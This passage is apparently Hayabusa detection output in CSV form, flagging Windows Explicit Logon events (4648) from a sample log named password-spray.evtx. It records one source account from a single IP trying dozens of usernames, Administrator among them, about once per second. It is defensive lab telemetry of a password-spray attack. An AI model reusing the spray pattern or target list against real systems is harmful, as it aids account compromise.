DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:06.085 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:07.171 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:08.254 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:09.323 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:10.377 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:11.465 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:12.549 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:13.611 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:14.687 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:15.750 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:16.841 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:17.922 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:19.035 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:20.097 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:21.156 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:22.222 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:23.295 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:24.342 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:25.404 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:26.504 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:27.583 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:28.654 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:29.712 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:30.787 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:31.861 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:32.955 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:34.020 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:35.081 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:36.151 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:37.238 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:38.310 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:39.393 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:40.457 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:41.553 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:42.613 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:43.686 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:44.738 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:45.818 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:46.896 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:47.953 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:49.019 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:50.082 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:51.156 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:52.214 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:53.285 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:54.354 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:55.438 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:56.513 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:57.578 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:58.661 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:59.721 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:00.795 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:01.865 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:02.941 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:04.015 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:05.097 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:06.182 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:07.239 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:08.315 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:09.399 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:10.468 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:11.549 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:12.621 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:13.709 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:14.769 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:15.849 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:16.918 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:17.999 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:19.068 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:20.129 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:21.201 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:22.250 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:23.338 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:24.404 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:25.468 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:26.529 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:27.607 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:28.691 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:29.753 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:30.838 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:31.910 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:32.983 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 